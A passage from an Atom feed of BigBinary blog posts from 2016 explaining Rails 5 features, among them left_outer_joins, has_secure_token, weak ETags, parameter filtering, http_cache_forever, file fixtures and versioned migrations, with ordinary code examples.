      <content type="html"><![CDATA[<p>Suppose in a blog application there are authors and posts. A post belongs to anauthor, while author has many posts.</p><p>The app needs to show a list of all the authors along with a number of poststhat they have written.</p><p>For this, we need to join author and posts table with &quot;left outer join&quot;. Moreabout &quot;left outer join&quot;<a href="http://blog.codinghorror.com/a-visual-explanation-of-sql-joins">here</a>,<a href="http://www.dofactory.com/sql/left-outer-join">here</a> and<a href="http://stackoverflow.com/questions/406294/left-join-and-left-outer-join-in-sql-server">here</a>.</p><p>In Rails 4.x, we need to write the SQL for left outer join manually as ActiveRecord does not have support for outer joins.</p><pre><code class="language-ruby">authors = Author.join('LEFT OUTER JOIN &quot;posts&quot; ON &quot;posts&quot;.&quot;author_id&quot; = &quot;authors&quot;.&quot;id&quot;')                .uniq                .select(&quot;authors.*, COUNT(posts.*) as posts_count&quot;)                .group(&quot;authors.id&quot;)</code></pre><p>Rails 5 has <a href="https://github.com/rails/rails/pull/12071">added left_outer_joins</a>method.</p><pre><code class="language-ruby">authors = Author.left_outer_joins(:posts)                .uniq                .select(&quot;authors.*, COUNT(posts.*) as posts_count&quot;)                .group(&quot;authors.id&quot;)</code></pre><p>It also allows to perform the left join on multiple tables at the same time.</p><pre><code class="language-ruby">&gt;&gt; Author.left_joins :posts, :comments  Author Load (0.1ms)  SELECT &quot;authors&quot;.* FROM &quot;authors&quot; LEFT OUTER JOIN &quot;posts&quot; ON &quot;posts&quot;.&quot;author_id&quot; = &quot;authors&quot;.&quot;id&quot; LEFT OUTER JOIN &quot;comments&quot; ON &quot;comments&quot;.&quot;author_id&quot; = &quot;authors&quot;.&quot;id&quot;</code></pre><p>If you feel <code>left_outer_joins</code> is too long to type, then Rails 5 also has analias method <code>left_joins</code>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[has_secure_token for unique random token in Rails 5]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/has-secure-token-to-generate-unique-random-token-in-rails-5"/>
      <updated>2016-03-23T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/has-secure-token-to-generate-unique-random-token-in-rails-5</id>
      <content type="html"><![CDATA[<p>We sometimes need unique and random tokens in our web apps. Here is how wetypically build it.</p><pre><code class="language-ruby">class User &lt; ActiveRecord::Base  before_create :set_access_token  private  def set_access_token    self.access_token = generate_token  end  def generate_token    loop do      token = SecureRandom.hex(10)      break token unless User.where(access_token: token).exists?    end  endend</code></pre><h2>has_secure_token in Rails 5</h2><p>Rails 5<a href="https://github.com/rails/rails/pull/18217">has added has_secure_token method</a>to generate a random alphanumeric token for a given column.</p><pre><code class="language-ruby">class User &lt; ApplicationRecord  has_secure_tokenend</code></pre><p>By default, Rails assumes that the attribute name is <code>token</code>. We can provide adifferent name as a parameter to <code>has_secure_token</code> if the attribute name is not<code>token</code>.</p><pre><code class="language-ruby">class User &lt; ApplicationRecord  has_secure_token :password_reset_tokenend</code></pre><p>The above code assumes that we already have <code>password_reset_token</code> attribute inour model.</p><pre><code class="language-ruby">&gt;&gt; user = User.new&gt;&gt; user.save=&gt; true&gt;&gt; user.password_reset_token=&gt; 'qjCbex522DfVEVd5ysUWppWQ'</code></pre><p>The generated tokens are URL safe and are of fixed length strings.</p><h2>Migration helper for generating token</h2><p>We can also <a href="https://github.com/rails/rails/pull/18448">generate</a> migration fortoken similar to other data types.</p><pre><code class="language-paintext">$ rails g migration add_auth_token_to_user auth_token:token</code></pre><pre><code class="language-ruby">class AddAuthTokenToUser &lt; ActiveRecord::Migration[5.0]  def change    add_column :users, :auth_token, :string    add_index :users, :auth_token, unique: true  endend</code></pre><p>Notice that migration automatically adds index on the generated column withunique constraint.</p><p>We can also generate a model with the token attribute.</p><pre><code class="language-plaintext">$ rails g model Product access_token:token</code></pre><pre><code class="language-ruby">class CreateProducts &lt; ActiveRecord::Migration[5.0]  def change    create_table :products do |t|      t.string :access_token      t.timestamps    end    add_index :products, :access_token, unique: true  endend</code></pre><p>Model generator also adds <code>has_secure_token</code> method to the model.</p><pre><code class="language-ruby">class Product &lt; ApplicationRecord  has_secure_token :access_tokenend</code></pre><h2>Regenerating tokens</h2><p>Sometimes we need to regenerate the tokens based on some expiration criteria.</p><p>In order to do that, we can simply call <code>regenerate_#{token_attribute_name}</code>which would regenerate the token and save it to its respective attribute.</p><pre><code class="language-ruby">&gt;&gt; user = User.first=&gt; &lt;User id: 11, name: 'John', email: 'john@example.com',         token: &quot;jRMcN645BQyDr67yHR3qjsJF&quot;,         password_reset_token: &quot;qjCbex522DfVEVd5ysUWppWQ&quot;&gt;&gt;&gt; user.password_reset_token=&gt; &quot;qjCbex522DfVEVd5ysUWppWQ&quot;&gt;&gt; user.regenerate_password_reset_token=&gt; true&gt;&gt; user.password_reset_token=&gt; &quot;tYYVjnCEd1LAXvmLCyyQFzbm&quot;</code></pre><h2>Beware of race condition</h2><p>It is possible to generate a race condition in the database while generating thetokens. So it is advisable to add a unique index in the database to deal withthis unlikely scenario.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Suppress save events in Rails 5]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/suppress-save-events-in-rails-5"/>
      <updated>2016-03-11T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/suppress-save-events-in-rails-5</id>
      <content type="html"><![CDATA[<p>Rails 5 added <a href="https://github.com/rails/rails/pull/18910">suppress</a> method whichis used to prevent the receiver from being saved during the given block.</p><h2>Use case for suppress method</h2><p>Let's say, we have an E-commerce application, which has many products. Whenevernew product is launched then subscribed customers are notified about it.</p><pre><code class="language-ruby">class Product &lt; ApplicationRecord  has_many :notifications  belongs_to :seller  after_save :send_notification  def launch!    update_attributes!(launched: true)  end  private  def send_notification    notifications.create(message: 'New product Launched', seller: seller)  endendclass Notification &lt; ApplicationRecord  belongs_to :product  belongs_to :seller  after_create :send_notifications  private  def send_notifications    # Sends notification about product to customers.  endendclass Seller &lt; ApplicationRecord  has_many :productsend</code></pre><p>This creates a notification record every time we launch a product.</p><pre><code class="language-ruby">&gt;&gt; Notification.count=&gt; 0&gt;&gt; seller = Seller.last=&gt; &lt;Seller id: 6, name: &quot;John&quot;&gt;&gt;&gt; product = seller.products.create(name: 'baseball hat')=&gt; &lt;Product id: 4, name: &quot;baseball hat&quot;, seller_id: 6&gt;&gt;&gt; product.launch!&gt;&gt; Notification.count=&gt; 1</code></pre><p>Now, we have a situation where we need to launch a product but we don't want tosend notifications about it.</p><p>Before Rails 5, this was possible only by adding more conditions.</p><h2>ActiveRecord::Base.Suppress in Rails 5</h2><p>In Rails 5, we can use <code>ActiveRecord::Base.suppress</code> method to suppress creatingof notifications as shown below.</p><pre><code class="language-ruby">class Product &lt; ApplicationRecord  def launch_without_notifications    Notification.suppress do      launch!    end  endend&gt;&gt; Notification.count=&gt; 0&gt;&gt; product = Product.create!(name: 'tennis hat')=&gt; &lt;Event id: 1, name: &quot;tennis hat&quot;&gt;&gt;&gt; product.launch_without_notifications&gt;&gt; Notification.count=&gt; 0</code></pre><p>As we can see, no new notifications were created when product is launched inside<code>Notification.suppress</code> block.</p><p>Checkout <a href="https://github.com/rails/rails/pull/18910">the pull request</a> to gainbetter understanding of how <code>suppress</code> works.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 improves rendering partial from cache]]></title>
       <author><name>Ratnadeep Deshmane</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-makes-partial-redering-from-cache-substantially-faster"/>
      <updated>2016-03-09T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-makes-partial-redering-from-cache-substantially-faster</id>
      <content type="html"><![CDATA[<p>Let's have a look at Rails view code that renders partial using a collection.</p><pre><code class="language-erb"># index.html.erb&lt;%= render partial: 'todo', collection: @todos %&gt;# _todo.html.erb&lt;% cache todo do %&gt;  &lt;%= todo.name %&gt;&lt;% end %&gt;</code></pre><p>In the above case Rails will do one fetch from the cache for each todo.</p><p>Fetch is usually pretty fast with any caching solution, however, one fetch pertodo can make the app slow.</p><p>Gem <a href="https://github.com/n8/multi_fetch_fragments">multi_fetch_fragments</a> fixedthis issue by using<a href="http://api.rubyonrails.org/classes/ActiveSupport/Cache/Store.html#method-i-read_multi">read_multi</a>api provided by Rails.</p><p>In a single call to cache, this gem fetches all the cache fragments for acollection. The author of the gem saw<a href="http://ninjasandrobots.com/rails-faster-partial-rendering-and-caching">78% speed improvement</a>by using this gem.</p><p>The features of this gem<a href="https://github.com/rails/rails/pull/18948">have been folded into Rails 5</a>.</p><p>To get benefits of collection caching, just add <code>cached: true</code> as shown below.</p><pre><code class="language-erb"># index.html.erb&lt;%= render partial: 'todo', collection: @todos, cached: true %&gt;# _todo.html.erb&lt;% cache todo do %&gt;  &lt;%= todo.name %&gt;&lt;% end %&gt;</code></pre><p>With <code>cached: true</code> present, Rails will use <code>read_multi</code> to the cache storeinstead of reading from it every partial.</p><p>Rails will also log cache hits in the logs as below.</p><pre><code class="language-plaintext">  Rendered collection of todos/_todo.html.erb [100 / 100 cache hits] (339.5ms)</code></pre><p>Checkout <a href="https://github.com/rails/rails/pull/23695">the pull request</a> to gainbetter understanding about how collection caching works.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 switches from strong etags to weak etags]]></title>
       <author><name>Prajakta Tambe</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-switches-from-strong-etags-to-weak-tags"/>
      <updated>2016-03-08T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-switches-from-strong-etags-to-weak-tags</id>
      <content type="html"><![CDATA[<p><a href="https://en.wikipedia.org/wiki/HTTP_ETag">ETag</a>, short for entity tag, is a partof HTTP header and is used for web cache validation. ETag is a digest of theresource that uniquely identifies specific version of the resource. This helpsbrowser and web servers determine if resource in the browser's cache is exactlysame as the resource on the server.</p><h3>Strong v/s Weak ETags</h3><p>ETag supports<a href="https://tools.ietf.org/html/rfc2616#section-13.3.3">strong and weak validation</a>of the resource.</p><p>Strong ETag indicates that resource content is same for response body and theresponse headers.</p><p>Weak ETag indicates that the two representations are semantically equivalent. Itcompares only the response body.</p><p>Weak ETags are<a href="https://github.com/rails/rails/blob/a61bf5f5b63780a3e0b4c2d4339967df82b370de/actionpack/lib/action_dispatch/http/cache.rb#L91-L94">prefixed with</a><code>W\</code> and thus one can easily distinguish between Weak ETags and Strong ETags.</p><pre><code class="language-plaintext">&quot;543b39c23d8d34c232b457297d38ad99&quot;     Strong ETagW/&quot;543b39c23d8d34c232b457297d38ad99&quot;   Weak ETag</code></pre><p>W3 has<a href="https://www.w3.org/Protocols/HTTP/1.1/rfc2616bis/issues/#i71">an example</a> pageto illustrate how ETag matching works.</p><p>When server receives a request, it returns an ETag header as part of HTTPresponse. This ETag represents state of the resource. For the subsequent HTTPrequests, client sends this ETag via <code>If-None-Match</code> header to identify if theresource is changed or not. The server will compare the current ETag and the onesent by the client. If ETag matches, server responds with <code>304 Not modified</code>.This means resource content in the client's cache is up-to-date. If resource ischanged, server will send updated resource along with the new ETag.</p><p>Let's see it in action.</p><h2>ETags in Rails 4.x</h2><p>Rails 4.x generates strong ETags by default i.e without <code>W/</code> prefix.</p><pre><code class="language-ruby">class ItemsController &lt; ApplicationController  def show    @item = Item.find(params[:id])    fresh_when @item  endend</code></pre><p>We are making first request to the server.</p><pre><code class="language-plaintext">$ curl -i http://localhost:3000/items/1HTTP/1.1 200 OKX-Frame-Options: SAMEORIGINX-Xss-Protection: 1; mode=blockX-Content-Type-Options: nosniffEtag: &quot;618bbc92e2d35ea1945008b42799b0e7&quot;Last-Modified: Sat, 30 Jan 2016 08:02:12 GMTContent-Type: text/html; charset=utf-8Cache-Control: max-age=0, private, must-revalidateX-Request-Id: 98359119-14ae-4e4e-8174-708abbc3fd4bX-Runtime: 0.412232Server: WEBrick/1.3.1 (Ruby/2.2.2/2015-04-13)Date: Fri, 04 Mar 2016 10:50:38 GMTContent-Length: 1014Connection: Keep-Alive</code></pre><p>For the next request, we will send ETag that was sent by the sever. And noticethat server returns <code>304 Not Modified</code>.</p><pre><code class="language-plaintext">$ curl -i -H 'If-None-Match: &quot;618bbc92e2d35ea1945008b42799b0e7&quot;' http://localhost:3000/items/1HTTP/1.1 304 Not ModifiedX-Frame-Options: SAMEORIGINX-Xss-Protection: 1; mode=blockX-Content-Type-Options: nosniffEtag: &quot;618bbc92e2d35ea1945008b42799b0e7&quot;Last-Modified: Sat, 30 Jan 2016 08:02:12 GMTCache-Control: max-age=0, private, must-revalidateX-Request-Id: e4447f82-b96c-4482-a5ff-4f5003910c18X-Runtime: 0.012878Server: WEBrick/1.3.1 (Ruby/2.2.2/2015-04-13)Date: Fri, 04 Mar 2016 10:51:22 GMTConnection: Keep-Alive</code></pre><h2>Rails 5 sets Weak ETags by default</h2><p>In Rails 5, all ETags generated by Rails will be<a href="https://github.com/rails/rails/pull/17573">weak by default</a>.</p><pre><code class="language-plaintext">$ curl -i http://localhost:3000/items/1HTTP/1.1 200 OKX-Frame-Options: SAMEORIGINX-Xss-Protection: 1; mode=blockX-Content-Type-Options: nosniffEtag: W/&quot;b749c4dd1b20885128f9d9a1a8ba70b6&quot;Last-Modified: Sat, 05 Mar 2016 00:00:00 GMTContent-Type: text/html; charset=utf-8Cache-Control: max-age=0, private, must-revalidateX-Request-Id: a24b986c-74f0-4e23-9b1d-0b52cb3ef906X-Runtime: 0.038372Server: WEBrick/1.3.1 (Ruby/2.2.3/2015-08-18)Date: Fri, 04 Mar 2016 10:48:35 GMTContent-Length: 1906Connection: Keep-Alive</code></pre><p>Now for the second request, server will return <code>304 Not Modified</code> response asbefore, but the ETag is weak ETag.</p><pre><code class="language-plaintext">$ curl -i -H 'If-None-Match: W/&quot;b749c4dd1b20885128f9d9a1a8ba70b6&quot;' http://localhost:3000/items/1HTTP/1.1 304 Not ModifiedX-Frame-Options: SAMEORIGINX-Xss-Protection: 1; mode=blockX-Content-Type-Options: nosniffEtag: W/&quot;b749c4dd1b20885128f9d9a1a8ba70b6&quot;Last-Modified: Sat, 05 Mar 2016 00:00:00 GMTCache-Control: max-age=0, private, must-revalidateX-Request-Id: 7fc8a8b9-c7ff-4600-bf9b-c847201973ccX-Runtime: 0.005469Server: WEBrick/1.3.1 (Ruby/2.2.3/2015-08-18)Date: Fri, 04 Mar 2016 10:49:27 GMTConnection: Keep-Alive</code></pre><h2>Why this change?</h2><p>Rails does not perform strong validation of ETags as implied by strong ETagsspec. Rails just checks whether the incoming ETag from the request headersmatches with the ETag of the generated response. It does not do byte by bytecomparison of the response.</p><p>This was true even before Rails 5. So this change is more of a coursecorrection. Rack also<a href="https://github.com/rack/rack/issues/681">generates weak ETags</a> by defaultbecause of similar reasons.</p><p><a href="https://twitter.com/mnot">Mark Notthingham</a> is chair of<a href="http://httpwg.org">HTTP Working Group</a> and he<a href="https://www.mnot.net/blog/2007/08/07/etags">has written about etags</a> which hassome useful links to other ETag resources.</p><h3>How to use strong ETags in Rails 5</h3><p>If we want to bypass default Rails 5 behavior to use strong ETags then we can doby following way.</p><pre><code class="language-ruby">class ItemsController &lt; ApplicationController  def show    @item = Item.find(params[:id])    fresh_when strong_etag: @item  endend</code></pre><p>This will generate strong Etag i.e without <code>W/</code> prefix.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Parameter filtering enhancement in Rails 5]]></title>
       <author><name>Vijay Kumar Agrawal</name></author>
      <link href="https://www.bigbinary.com/blog/parameter-filtering-enhacement-rails-5"/>
      <updated>2016-03-07T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/parameter-filtering-enhacement-rails-5</id>
      <content type="html"><![CDATA[<p>For security reasons, we do not want sensitive data like passwords, credit cardinformation, auth keys etc to appear in log files.</p><p>Rails makes it very easy to filter such data. Just add following line in<code>application.rb</code> to filter sensitive information.</p><pre><code class="language-ruby">config.filter_parameters += [:password]</code></pre><p>Now the log file will show <code>[FILTERED]</code> instead of real password value.</p><p>This replacement of <code>password</code> with <code>[FILTERED]</code> is done recursively.</p><pre><code class="language-ruby">{user_name: &quot;john&quot;, password: &quot;123&quot;}{user: {name: &quot;john&quot;, password: &quot;123&quot;}}{user: {auth: {id: &quot;john&quot;, password: &quot;123&quot;}}}</code></pre><p>In all the above cases, &quot;123&quot; would be replaced by &quot;[FILTERED]&quot;.</p><p>Now think of a situation where we do not want to filter all the occurrence of akey. Here is an example.</p><pre><code class="language-ruby">{credit_card: {number: &quot;123456789&quot;, code: &quot;999&quot;}}{user_preference: {color: {name: &quot;Grey&quot;, code: &quot;999999&quot;}}}</code></pre><p>We definitely want to filter <code>[:credit_card][:code]</code> but we want<code>[:color][:code]</code> to show up in the log file.</p><p>This <a href="https://github.com/rails/rails/pull/13897">can be achieved in Rails 5</a>.</p><p>The application.rb changes from</p><pre><code class="language-ruby">config.filter_parameters += [&quot;code&quot;]</code></pre><p>to</p><pre><code class="language-ruby">config.filter_parameters += [&quot;credit_card.code&quot;]</code></pre><p>In this case so long as parent of <code>code</code> is <code>credit_card</code> Rails will filter thedata.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 adds http_cache_forever]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-adds-http-cache-forever"/>
      <updated>2016-03-04T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-adds-http-cache-forever</id>
      <content type="html"><![CDATA[<p>Rails 5 allows to<a href="https://github.com/rails/rails/pull/18394">cache HTTP responses forever</a> byintroducing <code>http_cache_forever</code> method.</p><p>Sometimes, we have static pages that never/rarely change.</p><pre><code class="language-ruby"># app/controllers/home_controller.rbclass HomeController &lt; ApplicationController  def index    render  endend# app/views/home/index.html.erb&lt;h1&gt;Welcome&lt;/h1&gt;</code></pre><p>Let's see log for the above action.</p><pre><code class="language-plaintext">Processing by HomeController#index as HTML  Rendered home/index.html.erb within layouts/application (1.3ms)Completed 200 OK in 224ms (Views: 212.4ms | ActiveRecord: 0.0ms) And so on for every request for this action.</code></pre><p>There is no change in the response and still we are rendering same thing againand again and again.</p><h2>Rails 5 introduces http_cache_forever</h2><p>When response does not change then we want browsers and proxies to cache it fora long time.</p><p>Method <code>http_cache_forever</code> allows us to set response headers to tell browsersand proxies that response has not modified.</p><pre><code class="language-ruby"># app/controllers/home_controller.rbclass HomeController &lt; ApplicationController  def index    http_cache_forever(public: true) {}  endend# ORclass HomeController &lt; ApplicationController  def index    http_cache_forever(public: true) do      render    end  endend# app/views/home/index.html.erb&lt;h1&gt;Welcome&lt;/h1&gt;</code></pre><p>Now let's look at the log for the modified code.</p><pre><code class="language-plaintext"># When request is made for the first time.Processing by HomeController#index as HTML  Rendered home/index.html.erb within layouts/application (1.3ms)Completed 200 OK in 224ms (Views: 212.4ms | ActiveRecord: 0.0ms)# For consecutive requests for the same pageProcessing by HomeController#index as HTMLCompleted 304 Not Modified in 2ms (ActiveRecord: 0.0ms)</code></pre><p>On first hit, we serve the request normally but, then on each subsequent requestcache is revalidated and a &quot;304 Not Modified&quot; response is sent to the browser.</p><h2>Options with http_cache_forever</h2><p>By default, HTTP responses are cached only on the user's web browser. To allowproxies to cache the response, we can set public to <code>true</code> to indicate that theycan serve the cached response.</p><h2>Use http_cache_forever with caution</h2><p>By using this method, <code>Cache-Control: max-age=3155760000</code> is set as responseheader and browser/proxy won't revalidate the resource back to the server unlessforce reload is done.</p><p>In case force reload is done, <code>Cache-Control: max-age=0</code> is set as requestheader.</p><p>In this case, browser will receive the changed resource whether ETag is changedor not.</p><p><code>http_cache_forever</code> is literally going to set the headers to cache it for 100years and developers would have to take extra steps to revalidate it. So, thisshould be used with extra care.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Better exception responses in Rails 5 API apps]]></title>
       <author><name>Akshay Mohite</name></author>
      <link href="https://www.bigbinary.com/blog/better-exception-responses-in-rails-5-api-apps"/>
      <updated>2016-03-03T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/better-exception-responses-in-rails-5-api-apps</id>
      <content type="html"><![CDATA[<p>Rails 4.x returns error information in HTML page whenever there is anyexception, in the development environment.</p><p>This is fine for normal HTML requests. But traditionally, Rails always returnedwith HTML response for exceptions for all requests, including JSON on XMLrequests in development.</p><p>We can now generate API only apps in Rails 5. In case of such apps, it's betterto have the error message in the format in which request was made. Having anHTML response for a JSON endpoint like <code>http://localhost:3000/posts.json</code> is notgoing to help in debugging why the exception happened.</p><h2>New config option debug_exception_response_format</h2><p>Rails 5 has introduced<a href="https://github.com/rails/rails/pull/20831">new configuration</a> to respond withproper format for exceptions.</p><pre><code class="language-ruby"># config/environments/development.rbconfig.debug_exception_response_format = :api</code></pre><p>Let's see an example of the response received with this configuration.</p><pre><code class="language-bash">$ curl localhost:3000/posts.json{&quot;status&quot;:404,&quot;error&quot;:&quot;Not Found&quot;,&quot;exception&quot;:&quot;#\u003cActionController::RoutingError: No route matches [GET] \&quot;/posts.json\&quot;\u003e&quot;,&quot;traces&quot;:{&quot;Application Trace&quot;:[...],&quot;Framework Trace&quot;:[...]}}</code></pre><p>The <code>status</code> key will represent HTTP status code and <code>error</code> key will representthe corresponding Rack HTTP status.</p><p><code>exception</code> will print the output of actual exception in <code>inspect</code> format.</p><p><code>traces</code> will contain application and framework traces similar to how they aredisplayed in HTML error page.</p><p>By default, <code>config.debug_exception_response_format</code> is set to <code>:api</code> so as torender responses in the same format as requests.</p><p>If you want the original behavior of rendering HTML pages, you can configurethis option as follows.</p><pre><code class="language-ruby"># config/environments/development.rbconfig.debug_exception_response_format = :default</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Use file_fixture to access test files in Rails 5]]></title>
       <author><name>Ershad Kunnakkadan</name></author>
      <link href="https://www.bigbinary.com/blog/use-file_fixture-to-access-test-files-rails-5"/>
      <updated>2016-03-02T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/use-file_fixture-to-access-test-files-rails-5</id>
      <content type="html"><![CDATA[<p>While writing tests sometimes we need to read files to compare the output. Forexample a test might want to compare the API response with pre determined datastored in a file.</p><p>Here is an example.</p><pre><code class="language-ruby"># In test helperdef file_data(name)  File.read(Rails.root.to_s + &quot;/tests/support/files/#{name}&quot;)end# In testclass PostsControllerTest &lt; ActionDispatch::IntegrationTest  setup do    @post = posts(:one)  end  test &quot;should get index&quot; do    get posts_url, format: :json    assert_equal file_data('posts.json'), response.body  endend</code></pre><h2>File Fixtures in Rails 5</h2><p>In Rails 5, we can now organize such test files as fixtures.</p><p>Newly generated Rails 5 applications, will have directory <code>test/fixtures/files</code>to store such test files.</p><p>These test files can be accessed using <code>file_fixture</code> helper method in tests.</p><pre><code class="language-ruby">require 'test_helper'class PostsControllerTest &lt; ActionDispatch::IntegrationTest  setup do    @post = posts(:one)  end  test &quot;should get index&quot; do    get posts_url, format: :json    assert_equal response.body, file_fixture('posts.json').read  endend</code></pre><p>The <code>file_fixture</code> method returns <code>Pathname</code> object, so it's easy to extractfile specific information.</p><pre><code class="language-ruby">file_fixture('posts.json').readfile_fixture('song.mp3').size</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Migrations are versioned in Rails 5]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/migrations-are-versioned-in-rails-5"/>
      <updated>2016-03-01T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/migrations-are-versioned-in-rails-5</id>
      <content type="html"><![CDATA[<p>We will see how migrations in Rails 5 differ by looking at different cases.</p><h2>Case I</h2><p>In Rails 4.x command</p><pre><code class="language-ruby">rails g model User name:string</code></pre><p>will generate migration as shown below.</p><pre><code class="language-ruby">class CreateUsers &lt; ActiveRecord::Migration  def change    create_table :users do |t|      t.string :name      t.timestamps null: false    end  endend</code></pre><p>In Rails 5 the same command will generate following migration.</p><pre><code class="language-ruby">class CreateUsers &lt; ActiveRecord::Migration[5.0]  def change    create_table :users do |t|      t.string :name      t.timestamps    end  endend</code></pre><p>Let's see the generated schema after running migration generated in Rails 5.</p><pre><code class="language-sql">sqlite&gt; .schema usersCREATE TABLE &quot;users&quot; (&quot;id&quot; INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL, &quot;name&quot; varchar, &quot;created_at&quot; datetime NOT NULL, &quot;updated_at&quot; datetime NOT NULL);sqlite&gt;</code></pre><p>Rails 5 added the <code>NOT NULL</code> constraints on the timestamps columns even thoughnot null constraint was not specified in the migration.</p><h2>Case II</h2><p>Let's look at another example.</p><p>In Rails 4.x command</p><pre><code class="language-ruby">rails g model Task user:references</code></pre><p>would generate following migration.</p><pre><code class="language-ruby">class CreateTasks &lt; ActiveRecord::Migration  def change    create_table :tasks do |t|      t.references :user, index: true, foreign_key: true      t.timestamps null: false    end  endend</code></pre><p>In Rails 5.0, same command will generate following migration.</p><pre><code class="language-ruby">class CreateTasks &lt; ActiveRecord::Migration[5.0]  def change    create_table :tasks do |t|      t.references :user, foreign_key: true      t.timestamps    end  endend</code></pre><p>There is no mention of <code>index: true</code> in the above migration. Let's see thegenerated schema after running Rails 5 migration.</p><pre><code class="language-sql">sqlite&gt; .schema tasksCREATE TABLE &quot;tasks&quot; (&quot;id&quot; INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL, &quot;user_id&quot; integer, &quot;created_at&quot; datetime NOT NULL, &quot;updated_at&quot; datetime NOT NULL);CREATE INDEX &quot;index_tasks_on_user_id&quot; ON &quot;tasks&quot; (&quot;user_id&quot;);</code></pre><p>As you can see, an index on <code>user_id</code> column is added even though it's notpresent in the migration.</p><h2>Migration API has changed in Rails 5</h2><p>Rails 5 has changed migration API because of which even though <code>null: false</code>options is not passed to timestamps when migrations are run then <code>not null</code> is<a href="https://github.com/rails/rails/commit/a939506f297b667291480f26fa32a373a18ae06a">automatically added</a>for timestamps.</p><p>Similarly, we want indexes for referenced columns in almost all cases. So Rails5 does not need references to have <code>index: true</code>. When migrations are run thenindex is <a href="https://github.com/rails/rails/pull/23179">automatically created</a>.</p><p>Now let's assume that an app was created in Rails 4.x. It has a bunch ofmigrations. Later the app was upgraded to Rails 5. Now when older migrations arerun then those migrations will behave differently and will create a differentschema file. This is a problem.</p><p>Solution is versioned migrations.</p><h3>Versioned migrations in Rails 5</h3><p>Let's look at the migration generated in Rails 5 closely.</p><pre><code class="language-ruby">class CreateTasks &lt; ActiveRecord::Migration[5.0]  def change    create_table :tasks do |t|      t.references :user, index: true, foreign_key: true      t.timestamps null: false    end  endend</code></pre><p>In this case <code>CreateUsers</code> class is now inheriting from<code>ActiveRecord::Migration[5.0]</code> instead of <code>ActiveRecord::Migration</code>.</p><p>Here [5.0] is Rails version that generated this migration.</p><h2>Solving the issue with older migrations</h2><p>Whenever Rails 5 runs migrations, it checks the class of the current migrationfile being run. If it's 5.0, it uses the new migration API which has changeslike automatically adding <code>null: false</code> to timestamps.</p><p>But whenever the class of migration file is other than<code>ActiveRecord::Migration[5.0]</code>, Rails will use a compatibility layer ofmigrations API. Currently this<a href="https://github.com/rails/rails/blob/434c8dc96759d4eca36ca05865b6321c54a2a90b/activerecord/lib/active_record/migration/compatibility.rb#L6-L93">compatibility layer</a>is present for Rails 4.2. What it means is that all migration generated prior tousage of Rails 5 will be treated as if they were generate in Rails 4.2.</p><p>You will also see a<a href="https://github.com/rails/rails/blob/434c8dc96759d4eca36ca05865b6321c54a2a90b/activerecord/lib/active_record/migration/compatibility.rb#L105-L112">deprecation warning</a>asking user to add the version of the migration to the class name for oldermigrations.</p><p>So if you are migrating a Rails 4.2 app, all of your migrations will have class<code>ActiveRecord::Migration</code>. If you run those migrations in Rails 5, you will seea warning asking to add version name to the class name so that class name lookslike <code>ActiveRecord::Migration[4.2]</code>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 improves redirect_to :back method]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-improves-redirect_to_back-with-redirect-back"/>
      <updated>2016-02-29T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-improves-redirect_to_back-with-redirect-back</id>
      <content type="html"><![CDATA[<p>In Rails 4.x, for going back to previous page we use <code>redirect_to :back</code>.</p><p>However sometimes we get <code>ActionController::RedirectBackError</code> exception when<code>HTTP_REFERER</code> is not present.</p><pre><code class="language-ruby">class PostsController &lt; ApplicationController  def publish    post = Post.find params[:id]    post.publish!    redirect_to :back  endend</code></pre><p>This works well when <code>HTTP_REFERER</code> is present and it redirects to previouspage.</p><p>Issue comes up when <code>HTTP_REFERER</code> is not present and which in turn throwsexception.</p><p>To avoid this exception we can use <code>rescue</code> and redirect to root url.</p><pre><code class="language-ruby">class PostsController &lt; ApplicationController  rescue_from ActionController::RedirectBackError, with: :redirect_to_default  def publish    post = Post.find params[:id]    post.publish!    redirect_to :back  end  private  def redirect_to_default    redirect_to root_path  endend</code></pre><h2>Improvement in Rails 5</h2><p>In Rails 5, <code>redirect_to :back</code> has been deprecated and instead<a href="https://github.com/rails/rails/pull/22506">a new method has been added</a> called<code>redirect_back</code>.</p><p>To deal with the situation when <code>HTTP_REFERER</code> is not present, it takes requiredoption <code>fallback_location</code>.</p><pre><code class="language-ruby">class PostsController &lt; ApplicationController  def publish    post = Post.find params[:id]    post.publish!    redirect_back(fallback_location: root_path)  endend</code></pre><p>This redirects to <code>HTTP_REFERER</code> when it is present and when <code>HTTP_REFERER</code> isnot present then redirects to whatever is passed as <code>fallback_location</code>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 allows configuring queue name for mailers]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-allows-configuring-queue-name-for-mailers"/>
      <updated>2016-02-26T12:00:00+00:00</updated>
